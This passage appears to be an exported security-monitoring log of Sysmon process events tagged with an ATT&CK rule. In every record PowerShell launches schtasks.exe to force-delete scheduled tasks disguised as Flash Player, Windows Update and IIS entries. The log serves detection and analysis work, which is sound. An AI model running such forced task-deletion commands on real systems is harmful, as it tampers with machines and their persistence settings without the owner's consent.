Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.663"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-001012e92e00}"",""processId"":""7336"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN IIS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.470",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.633 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001084e72e00} +ProcessId: 7480 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.638812400Z"",""eventRecordID"":""3555"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.633\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001084e72e00}\r\nProcessId: 7480\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.633"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-001084e72e00}"",""processId"":""7480"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.453",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.593 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-0010a6e52e00} +ProcessId: 612 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.596028900Z"",""eventRecordID"":""3554"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.593\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-0010a6e52e00}\r\nProcessId: 612\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.593"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-0010a6e52e00}"",""processId"":""612"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.437",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.528 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00107ee32e00} +ProcessId: 2940 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.537568000Z"",""eventRecordID"":""3553"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.528\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00107ee32e00}\r\nProcessId: 2940\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.528"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-00107ee32e00}"",""processId"":""2940"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.423",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.435 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00107ce12e00} +ProcessId: 1684 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN AdobeFlashPlayer /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.437268600Z"",""eventRecordID"":""3552"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.435\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00107ce12e00}\r\nProcessId: 1684\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.435"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-00107ce12e00}"",""processId"":""1684"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN AdobeFlashPlayer /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.405",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.302 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001067df2e00} +ProcessId: 3048 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.305581500Z"",""eventRecordID"":""3551"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.302\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001067df2e00}\r\nProcessId: 3048\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.302"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-001067df2e00}"",""processId"":""3048"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.390",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.248 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00105edd2e00} +ProcessId: 360 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.270854500Z"",""eventRecordID"":""3550"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.248\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00105edd2e00}\r\nProcessId: 360\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: 